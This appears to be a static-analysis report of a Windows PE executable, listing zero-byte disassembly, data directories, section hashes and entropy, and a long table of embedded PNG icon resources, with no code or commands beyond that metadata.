                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf0000 | 0x13dee | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x110000 | 0x312d9e | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x3d4400 | 0x4f78 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x106000 | 0x95f8 | .rdata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x105000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xf1f64 | 0x1a00 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xa9000 | 0xa8e00 | 4dcedc69be1aede81644ce6a3e6887bd | False | 0.46360045799407845 | data | 6.68785487611313 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0xaa000 | 0x1000 | 0xe00 | 47f13ebf2c1d7f5f845d183af3921c70 | False | 0.533203125 | data | 5.726454537490657 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0xab000 | 0x4000 | 0x4000 | 50b772b21b84466c3b21a7e6d5fd0748 | False | 0.48486328125 | DOS executable (block device driver) | 5.33588059365472 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0xaf000 | 0x41000 | 0x41000 | 5bff631ec26d3f55787437155f977ca0 | False | 0.6882549579326923 | data | 7.410450162378423 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xf0000 | 0x14000 | 0x13e00 | a6fdfc22de58e230668e6140af18f713 | False | 0.20748575078616352 | data | 5.442044496747251 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x104000 | 0x1000 | 0x1000 | 23a516eee44fe9d482d78f4329d3baa2 | False | 0.392822265625 | data | 4.09924522772341 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x105000 | 0xb000 | 0x200 | 7630f45a6a5af0e127c28e46ae9ee2bb | False | 0.05078125 | data | 0.18415065608732903 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x110000 | 0x312d9e | 0x312e00 | bfa7a1e9c6f9ea922181699866c1a9f4 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
MAD | 0x11529c | 0x14 | data | | | 1.25
MAD | 0x1152b0 | 0x10ea4 | data | | | 1.0004474337509381
PNG | 0x126154 | 0x269b | PNG image data, 340 x 205, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9596276434281089
PNG | 0x1287f0 | 0x2248 | PNG image data, 340 x 205, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9644484958979034
PNG | 0x12aa38 | 0x1915 | PNG image data, 340 x 205, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9484503971344027
PNG | 0x12c350 | 0x2114 | PNG image data, 340 x 205, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9636277751535192
PNG | 0x12e464 | 0x18f | PNG image data, 19 x 18, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0275689223057645
PNG | 0x12e5f4 | 0x238 | PNG image data, 19 x 18, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0193661971830985
PNG | 0x12e82c | 0x5059 | PNG image data, 205 x 45, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.996159268802567
PNG | 0x133888 | 0x219 | PNG image data, 19 x 18, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0204841713221602
PNG | 0x133aa4 | 0x258 | PNG image data, 19 x 18, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0183333333333333
PNG | 0x133cfc | 0x203 | PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0155339805825243
PNG | 0x133f00 | 0x358 | PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0128504672897196
PNG | 0x134258 | 0x153 | PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9911504424778761
PNG | 0x1343ac | 0x34a | PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.013064133016627
PNG | 0x1346f8 | 0x2c6 | PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0154929577464789
PNG | 0x1349c0 | 0x114e | PNG image data, 49 x 46, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0024830699774265
PNG | 0x135b10 | 0x18a8 | PNG image data, 61 x 57, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.001742712294043
PNG | 0x1373b8 | 0x1e62 | PNG image data, 73 x 69, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.001414245307277
PNG | 0x13921c | 0x30a5 | PNG image data, 98 x 92, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.000883321288043
PNG | 0x13c2c4 | 0x475d | PNG image data, 122 x 115, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0008758005364278
                                  PNG0x140a240x6328PNG image data, 206 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.44425622439331863
                                  PNG0x146d4c0x608PNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0071243523316062
                                  PNG0x1473540x801PNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0053684724255734
                                  PNG0x147b580x782PNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.005723204994797
                                  PNG0x1482dc0x7c3PNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0055359838953195
                                  PNG0x148aa00x3f16PNG image data, 490 x 270, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9763467492260062
                                  PNG0x14c9b80x7b96PNG image data, 205 x 257, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9983564068525191
                                  PNG0x1545500x27fePNG image data, 768 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9854463762453605
                                  PNG0x156d500x13dPNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.003154574132492
                                  PNG0x156e900x167PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0139275766016713
                                  PNG0x156ff80x182PNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0129533678756477
                                  PNG0x15717c0x197PNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0171990171990173
                                  PNG0x1573140x213PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0207156308851224
                                  PNG0x1575280x1ffPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0215264187866928
                                  PNG0x1577280x268PNG image data, 25 x 25, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0178571428571428
                                  PNG0x1579900x2baPNG image data, 30 x 30, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.015759312320917
                                  PNG0x157c4c0x41dPNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0104463437796771
                                  PNG0x15806c0x4fbPNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.008627450980392
                                  PNG0x1585680x6b0PNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0064252336448598
                                  PNG0x158c180x896PNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0050045495905369
                                  PNG0x1594b00x21ePNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0018450184501846
                                  PNG0x1596d00x253PNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0033613445378151
                                  PNG0x1599240x275PNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8712241653418124
                                  PNG0x159b9c0x39ePNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8704103671706264
                                  PNG0x159f3c0x286PNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0170278637770898
                                  PNG0x15a1c40x2efPNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.014647137150466
                                  PNG0x15a4b40x3eePNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9701789264413518
                                  PNG0x15a8a40x4d2PNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9619124797406807
                                  PNG0x15ad780x410PNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.010576923076923
                                  PNG0x15b1880x51cPNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0084097859327217
                                  PNG0x15b6a40x6d1PNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0063037249283668
                                  PNG0x15bd780x832PNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0052430886558628
                                  PNG0x15c5ac0x3a9PNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0117395944503735
                                  PNG0x15c9580x43dPNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0101382488479262
                                  PNG0x15cd980x5bbPNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0074982958418541
                                  PNG0x15d3540x71cPNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.006043956043956
                                  PNG0x15da700x1f4PNG image data, 18 x 18, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.022
                                  PNG0x15dc640x266PNG image data, 23 x 23, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.017915309446254
                                  PNG0x15decc0x2c9PNG image data, 28 x 28, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0154277699859748
                                  PNG0x15e1980x386PNG image data, 37 x 37, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0121951219512195
                                  PNG0x15e5200x470PNG image data, 46 x 46, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0096830985915493
                                  PNG0x15e9900x10dPNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x15eaa00x1efPNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0121212121212122
                                  PNG0x15ec900x1baPNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9932126696832579
                                  PNG0x15ee4c0x165PNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7675070028011205
                                  PNG0x15efb40x20bPNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8107074569789675
                                  PNG0x15f1c00x10dPNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x15f2d00x1e0PNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0041666666666667
                                  PNG0x15f4b00x17dPNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.979002624671916
                                  PNG0x15f6300x165PNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7703081232492998
                                  PNG0x15f7980x20ePNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8098859315589354
                                  PNG0x15f9a80xf3PNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9794238683127572
                                  PNG0x15fa9c0xfaPNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.948
                                  PNG0x15fb980x119PNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9466192170818505
                                  PNG0x15fcb40x14bPNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7190332326283988
                                  PNG0x15fe000x17ePNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.6544502617801047
                                  PNG0x15ff800xefPNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9832635983263598
                                  PNG0x1600700xfePNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9803149606299213
                                  PNG0x1601700x11aPNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9680851063829787
                                  PNG0x16028c0x14fPNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7194029850746269
                                  PNG0x1603dc0x181PNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.6311688311688312
                                  PNG0x1605600x105PNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9693486590038314
                                  PNG0x1606680x115PNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1607800x122PNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9896551724137931
                                  PNG0x1608a40x16cPNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8159340659340659
                                  PNG0x160a100x1a1PNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7553956834532374
                                  PNG0x160bb40x103PNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.972972972972973
                                  PNG0x160cb80x118PNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.975
                                  PNG0x160dd00x126PNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9285714285714286
                                  PNG0x160ef80x16fPNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8092643051771117
                                  PNG0x1610680x1a5PNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7505938242280285
                                  PNG0x1612100xdePNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9234234234234234
                                  PNG0x1612f00xe9PNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9313304721030042
                                  PNG0x1613dc0xf0PNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.875
                                  PNG0x1614cc0x138PNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.6538461538461539
                                  PNG0x1616040x16aPNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.5994475138121547
                                  PNG0x1617700xdcPNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9090909090909091
                                  PNG0x16184c0xe8PNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9353448275862069
                                  PNG0x1619340xf2PNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9132231404958677
                                  PNG0x161a280x13dPNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.6624605678233438
                                  PNG0x161b680x16fPNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.6103542234332425
                                  PNG0x161cd80x1b7PNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0250569476082005
                                  PNG0x161e900x21cPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0203703703703704
                                  PNG0x1620ac0x279PNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0173775671406002
                                  PNG0x1623280x310PNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0140306122448979
                                  PNG0x1626380x3bcPNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0115062761506277
                                  PNG0x1629f40x386PNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0121951219512195
                                  PNG0x162d7c0x4c2PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0090311986863711
                                  PNG0x1632400x665PNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0067196090409285
                                  PNG0x1638a80x998PNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0044788273615635
                                  PNG0x1642400xd0fPNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.003290457672749
                                  PNG0x164f500x2b0PNG image data, 32 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0159883720930232
                                  PNG0x1652000x3c5PNG image data, 42 x 21, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.01139896373057
                                  PNG0x1655c80x4a3PNG image data, 52 x 26, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0092670598146587
                                  PNG0x165a6c0x5d7PNG image data, 63 x 31, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0073578595317725
                                  PNG0x1660440x715PNG image data, 84 x 42, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0060672917815774
                                  PNG0x16675c0x5e2PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0073041168658698
                                  PNG0x166d400x6f5PNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0061763054463784
                                  PNG0x1674380x7cbPNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0055137844611528
                                  PNG0x167c040xa5fPNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0041431261770244
                                  PNG0x1686640xcfaPNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9993979530403372
                                  PNG0x1693600x7c6PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0055276381909548
                                  PNG0x169b280x7a2PNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0056294779938588
                                  PNG0x16a2cc0xa9ePNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.004047093451067
                                  PNG0x16ad6c0x11ecPNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0023975588491718
                                  PNG0x16bf580x176ePNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.001833944648216
                                  PNG0x16d6c80x823PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0052808449351895
                                  PNG0x16deec0xa2cPNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0042242703533026
                                  PNG0x16e9180xc07PNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0035725885027607
                                  PNG0x16f5200x102fPNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0026550808592807
                                  PNG0x1705500x125fPNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.002338932596215
                                  PNG0x1717b00x6b6PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0064027939464493
                                  PNG0x171e680x8b7PNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0049305244285074
                                  PNG0x1727200xafcPNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0039118065433854
                                  PNG0x17321c0x110ePNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0025194686211636
                                  PNG0x17432c0x146aPNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9980864906238041
                                  PNG0x1757980x109PNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0075471698113208
                                  PNG0x1758a40x464PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7135231316725978
                                  PNG0x175d080x462PNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7112299465240641
                                  PNG0x17616c0x479PNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7170305676855895
                                  PNG0x1765e80x4b9PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7377998345740281
                                  PNG0x176aa40x6dcPNG image data, 24 x 23, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.00626423690205
                                  PNG0x1771800x939PNG image data, 30 x 29, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0046590427784836
                                  PNG0x177abc0xb1fPNG image data, 36 x 34, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0038637161924833
                                  PNG0x1785dc0x1151PNG image data, 48 x 46, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0024813895781637
                                  PNG0x1797300x17bePNG image data, 60 x 57, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0018098058571898
                                  PNG0x17aef00x7a9PNG image data, 68 x 22, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0056093829678736
                                  PNG0x17b69c0x122PNG image data, 9 x 8, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.006896551724138
                                  PNG0x17b7c00x103PNG image data, 9 x 8, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0038610038610039
                                  PNG0x17b8c40x146PNG image data, 14 x 14, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0153374233128833
                                  PNG0x17ba0c0x134PNG image data, 14 x 14, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0064935064935066
                                  PNG0x17bb400x164PNG image data, 14 x 14, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0196629213483146
                                  PNG0x17bca40x1c6PNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.024229074889868
                                  PNG0x17be6c0x21dPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0203327171903882
                                  PNG0x17c08c0x26fPNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0176565008025682
                                  PNG0x17c2fc0x2f4PNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0145502645502646
                                  PNG0x17c5f00x3adPNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0116896918172158
                                  PNG0x17c9a00x1524PNG image data, 64 x 60, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.0020325203252032
                                  PNG0x17dec40x1d78PNG image data, 80 x 75, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.001458112407211
                                  PNG0x17fc3c0x27c8PNG image data, 96 x 90, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.0010801256873527
                                  PNG0x1824040x3a7aPNG image data, 128 x 120, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.0007348029392118
                                  PNG0x185e800x51f4PNG image data, 160 x 150, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.0007626310772164
                                  PNG0x18b0740x3946PNG image data, 120 x 113, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.0007502387123175
                                  PNG0x18e9bc0x4aadPNG image data, 150 x 141, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.000836951404509
                                  PNG0x19346c0x6301PNG image data, 180 x 169, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.000631288222529
                                  PNG0x1997700xaa7bPNG image data, 240 x 226, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.000481176821025
                                  PNG0x1a41ec0xcc64PNG image data, 300 x 282, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.000496903906429
                                  PNG0x1b0e500x107fPNG image data, 48 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0026047833293867
                                  PNG0x1b1ed00x157dPNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.00199963642974
                                  PNG0x1b34500x1dc2PNG image data, 72 x 72, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0014439485429247
                                  PNG0x1b52140x2facPNG image data, 96 x 96, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0009013438216978
                                  PNG0x1b81c00x432cPNG image data, 120 x 120, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0009304489416144
                                  PNG0x1bc4ec0x102PNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9922480620155039
                                  PNG0x1bc5f00x1b6PNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9908675799086758
                                  PNG0x1bc7a80x16cPNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9752747252747253
                                  PNG0x1bc9140x170PNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.779891304347826
                                  PNG0x1bca840x201PNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8031189083820662
                                  PNG0x1bcc880xf6PNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9959349593495935
                                  PNG0x1bcd800xffPNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.984313725490196
                                  PNG0x1bce800x118PNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9714285714285714
                                  PNG0x1bcf980x14fPNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7253731343283583
                                  PNG0x1bd0e80x182PNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.6373056994818653
                                  PNG0x1bd26c0xddPNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9140271493212669
                                  PNG0x1bd34c0xe9PNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9356223175965666
                                  PNG0x1bd4380xf3PNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9135802469135802
                                  PNG0x1bd52c0x13ePNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.6666666666666666
                                  PNG0x1bd66c0x16fPNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.6076294277929155
                                  PNG0x1bd7dc0x112PNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9817518248175182
                                  PNG0x1bd8f00x119PNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9786476868327402
